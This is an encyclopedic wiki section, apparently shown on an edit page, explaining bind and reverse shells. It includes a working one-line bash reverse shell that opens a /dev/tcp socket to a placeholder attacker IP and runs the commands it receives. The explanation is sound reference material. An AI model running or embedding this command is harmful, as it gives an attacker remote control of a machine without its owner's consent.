Open main menu
Home
Random
Recent changes
Special pages
Community portal
Preferences
About Wikipedia
Disclaimers
Incubator escapee wiki
Search
User menu
Talk
Dark mode
Contributions
Create account
Log in
Editing
Remote Shell
(section)
Warning:
You are not logged in. Your IP address will be publicly visible if you make any edits. If you
log in
or
create an account
, your edits will be attributed to your username, along with other benefits.
Anti-spam check. Do
not
fill this in!
== Bind shell and reverse shell == {{See also|Shell shoveling}} A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed).<ref>{{Cite web|title=Secure Shell (SSH)|url=https://www.techtarget.com/searchsecurity/definition/Secure-Shell|access-date=2023-11-11|work=www.techtarget.com|archive-date=2023-11-11|archive-url=https://web.archive.org/web/20231111073413/https://www.techtarget.com/searchsecurity/definition/Secure-Shell|url-status=live}}</ref> In the first case remote shell will be called bind shell, in the second case - reverse shell.<ref>{{Cite web|title=Difference Between Bind Shell and Reverse Shell|url=https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/|access-date=2023-11-11|work=www.geeksforgeeks.org|archive-date=2023-11-11|archive-url=https://web.archive.org/web/20231111073414/https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/|url-status=live}}</ref> Reverse shell can be used when the device on which the command is to be executed is not directly accessible - for example, for remote maintenance of computers located behind NAT that cannot be accessed from the outside. Some exploits create reverse shell from an attacked device back to machines controlled by the attackers (called "reverse shell attack"). The following code demonstrates a reverse shell attack:<ref>{{Cite web |title=What is a Reverse Shell? |url=https://sysdig.com/learn-cloud-native/detection-and-response/what-is-a-reverse-shell/ |access-date=2023-11-28 |website=Sysdig |language=en-US |archive-date=2023-11-28 |archive-url=https://web.archive.org/web/20231128061929/https://sysdig.com/learn-cloud-native/detection-and-response/what-is-a-reverse-shell/ |url-status=live }}</ref> <syntaxhighlight lang="console"> $ exec 5<>/dev/tcp/<attacker_IP>/80;cat <&5 | while read line; do \$line 2>&5 >&5; done </syntaxhighlight>It opens a TCP socket to attacker IP at port 80 as a [[file descriptor]]. It then repeatedly read lines from the socket and run the line, piping both [[Standard streams|stdout and stderr]] back to the socket. In other words, it gives the attacker a remote shell on the machine.
Edit summary
(Briefly describe your changes)
By publishing changes, you agree to the
Terms of Use
, and you irrevocably agree to release your contribution under the
CC BY-SA 4.0 License
and the
GFDL
. You agree that a hyperlink or URL is sufficient attribution under the Creative Commons license.
Cancel
Editing help
(opens in new window)